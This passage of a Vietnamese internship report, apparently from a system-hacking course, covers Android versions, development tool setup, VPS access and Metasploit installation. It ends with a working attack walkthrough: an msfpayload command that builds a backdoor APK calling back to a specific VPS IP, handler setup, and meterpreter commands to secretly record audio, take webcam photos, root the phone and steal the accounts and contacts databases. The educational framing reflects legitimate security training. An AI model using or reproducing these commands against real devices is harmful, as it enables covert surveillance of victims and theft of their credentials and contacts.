phone
Xóa tất cả thông báo Xóa được từng thông báo
Chỉ có thể trả lời cuộc gọi khi màn
hình bị khóa
Có thể thực hiện nhiều tính năng
khi màn hình bị khóa
Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn
mặt (face unclock)
Không có quản lý mức độ sử dụng
dữ liệu
Có quản lý mức độ xử dụng dữ
liệu
Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p
3.3. Giao thức mạng:
Android 2.3 Android 4.0
Không hỗ trợ giao thức https Hỗ trợ giao thức https
63. 63
3.4. Yêu cầu phần cứng:
Android 2.3 Android 4.0
Cung cấp ít nhất 128MB cho
kernel
Cung cấp ít nhất 340MB cho
kernel
Dung lượng RAM ít nhất là
150MB
Dung lượng RAM ít nhất là
350MB
Thiết bị phải có khả năng tải về
một file 55MB hoặc hớn hơn
Thiết bị phải có khả năng tải về
một file 100MB hoặc lớn hơn
Độ phân giải màn hình ít nhất
100dpi
Độ phân giải màn hình ít nhất
120dpi
Yêu cầu phải có các phím vật lý Không yêu cầu phải có các phím
vật lý
Kiểm tra hiệu suất dựa trên thời
gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Báo thức: ít hơn 650ms
Kiểm ra hiệu suất dựa trên thời
gian mở ứng dụng:
Trình duyệt: ít hơn 1300ms
MMS/SMS: ít hơn 700ms
Cài đặt: ít hơn 700ms
64. 64
V. Tạo máy ảo android trên Eclipse
1, Bộ Java SE Development Kit (JDK)
JDK cung cấp một bộ công cụ cho cho người phát triển ứng dụng bằng ngôn ngữ
lập trình Java. Phần mềm được dùng để viết Applet Java hay những ứng dụng Java
khác, gồm có trình biên dịch, trình thông dịch, sửa lỗi, chạy applet và tài liệu nghiên
cứu.
JDK cho phép người sử dụng lưu, chỉnh sửa, in và biên dịch mã Java tạo ra. công cụ
này có thể được sử dụng để chạy và gỡ lỗi Java applet mà không cần phải thông qua
một trình duyệt web. Với tiện ích này, người dùng có thể tạo cơ sở dữ liệu cho việc
lập trình bằng Java, phát hiện các xung đột file JAR. Người dùng cũng có thể biên
dịch tập tin IDL sang Java.
Để download bộ JDK các bạn truy cập link sau :
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-
1880260.html
65. 65
Các bạn chọn Accept License Agreement sau đó chọn phiên bản phù hợp với hệ
điều hành đang sử dụng và download về.
66. 66
Sau khi download hoàn tất chúng ta tiến hành giải nén và cài đặt bộ java SDK này.
Quá trình cài đặt khá đơn giản ta chỉ cần nhấn next cho đến khi hoàn tất cài đặt.
Trong quá trình cài đặt ta có thể chọn vị trí lưu bằng cách chọn change và chọn nơi
lưu.
Sau khi cài đặt xong có thể kiểm tra lại bằng cách vào cửa sổ cmd nhập lệnh “Java”
68. 68
2, Eclipse IDE và Android SDK
- Eclipse là cơ sở cho việc xây dựng và chạy các công cụ phát triển phần mềm tích
hợp, xuyên suốt từ đầu đến cuối. Nền tảng này bao gồm các thành phần phần mềm
mã nguồn mở được các nhà cung cấp công cụ sử dụng để xây dựng các giải pháp
cắm thêm vào Các bàn làm việc (Workbench) phần mềm tích hợp. Nền tảng Eclipse
tích hợp công nghệ được biểu diễn thông qua một khung công tác được thiết kế và
triển khai thực hiện rõ ràng.
- Android SDK là một máy ảo của Android trên PC.SDK hỗ trợ bạn lập trình các
ứng dụng của Android trên PC
Để Eclipse và Android SDK nói trên các bạn truy cập link sau:
http://developer.android.com/sdk/index.html
Sau đó chọn
Sau đó tích vào I have read and…. Sau đó chọn phiên bàn Win và tiến hành
download
69. 69
Sau khi tải về hoàn tất ta giải nén và tiến hành cài đặt eclipse và SDK
70. 70
2.1, Cài đặt Eclipse
Mở file setup Eclipse, chọn đường dẫn ( vị trí lưu ) sau đó chọn ok.
71. 71
Giao diện của eclipse
2.2, Cài đặt Android SDK
Chọn Run as administrator file SDK manager
74. 74
Sau khi quá trình download hoàn tất, ta chọn Accpect License và chọn Install.
3, Tích hợp Android SDK vào Eclipse:
Sau khi đã hoàn tất cài đặt Eclipse và Android SDK ta tiến hành tích hợp Android
SDK vào Eclipse.
Bước 1: Mở Eclipse
76. 76
Đặt tên ở mục Name:
Ở mục Location ta nhập một trong hai địa chỉ sau
https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse
Sau đó chọn ok
Bước 2: Ở cửa sổ Name > Tick vào Developer Tools
77. 77
Bước 3: Chọn các Next > Next > Accept > Next > Finish – Run in Background
Bước 4: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư
mục Android SDK đã tải > Apply > OK
Bước 5: Khởi đông lại Eclipse
78. 78
VI. KẾT NỐI MÁY CHỦ ẢO VPS
1, Giới thiệu máy chủ ảo VPS:
- Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy
chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host
thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con
số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn
chế 100% khả năng bị hack local.
- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng
đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn
công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn
nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi
hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…
2, Đặc điểm của VPS:
- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng
dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web
bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
- Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài
nguyên mà không cần phải khởi động lại hệ thống.
- Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
79. 79
3, Giá trị khi sử dụng VPS:
- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS
phù hợp.
- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
4, Kết nối VPS:
- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta
cần sử dụng ứng dụng Remote Desktop Connection.
- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs >
Accessories > Remote Desktop Connection
- Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta
đăng ký tài khoản VPS.
- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.
80. 80
VII. CÀI ĐẶT METASPLOIT TRÊN VPS
Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành
tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại
Android
1. Giới thiệu về phần mềm Metasploit:
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm
tra, tấn công và khai thác lỗi của các service.
- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những
components được viết bằng C, Assembler, và Python.
- Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Giới thiệu payload Meterpreter:
- Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong
Metasploit framework.
- Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng
các máy remote computers. Nó được viết từ các developers dưới dạng shared
object( DLL) files.
- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn
không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống
virus.
- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload
Meterpreter này.
81. 81
3. Cài đặt Metasploit:
Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang
download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng
bản Community.
Bước 2: Tiến hành đăng ký để tải Metasploit
Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để Active
Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng ký.
82. 82
Bước 3: Cài đặt phần mềm qua file đã tải về
- Chọn thư mục cài đặt
- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790
- Chọn server và ngày hết hạn, để mặc định.
- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn
- Nhấp Finish và truy cập đến giao diện web của chương trình
Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link
https://localhost:3790/
Tạo một tài khoản sử dụng:
Nhập Key đã nhận từ email:
Chọn ACTIVATE LICENSE
83. 83
Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit >
Metasploit Console
84. 84
IIX. T N CÔNG Ấ MÁY ANDROID TỪ MÁY VPS
1. Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal.
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS>
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162
lport=4444 R> /root/Desktop/hack.apk
2. Tấn công điện thoại Android:
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể
mất vài chục phút.
Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy
Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận
được thông báo như sau:
85. 85
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
86. 86
3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.1 Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
3.2 Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
88. 88
3.4 Truy cập trực tiếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể
tiếp tục tấn công.
3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
89. 89
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
90. 90
Xem nội dung của contacts2.db bằng SQLite Manager
91. 91
3.7 Một số câu lệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
92. 92
PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN
· Giới thiệu bản thân
https://www.youtube.com/watch?v=CxY2FVXRLR0
· Cài đặt Kali Lunix trên máy ảo VMware
https://www.youtube.com/watch?v=UQxMjJsxMFY
· Tạo Applications chứa mã độc
https://www.youtube.com/watch?v=OQrSzidyMhs
· Tạo link liên kết chứa mã độc bằng XSSF
http://youtu.be/VNaJDwMrIYI
· Cài đặt JDK – Java SE Development Kit
http://youtu.be/GIzDLbKlJv0
· Tích hợp JDK và Eclipse, Tạo máy ảo Android trên Eclipse
http://youtu.be/bqCpa9NTbd4
· Tấn công Android từ môi trường VPS
http://youtu.be/FccqtFVeLz4
· Tổng kết thuận lợi, khó khan trong quá trình thực tập
https://www.youtube.com/watch?v=bqi3-sfqBBg
93. 93
PHỤ LỤC II : TÀI LIỆU THAM KHẢO
· http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-
may-android-110510
· http://sinhvienit.net/forum
· http://forum.bkav.com.vn
· http://developer.android.com/sdk/index.html#download
· http://www.oracle.com/technetwork/java/javase/downloads
· http://choimobile.vn/forums/#thao-luan-hdh-android.62
· http://www.oracle.com/technetwork/server- storage/
virtualbox/downloads/index.html
· http://www.genymotion.com/
· http://www.whitehat.vn/threads/
· https://code.google.com/p/dex2jar/
· https://code.google.com/p/innlab/downloads/detail?name=jd-gui-
0.3.3.windows.zip&
· http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao-
dien-cuc-manh.12/
· Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA –
www.Athena.Edu.Vn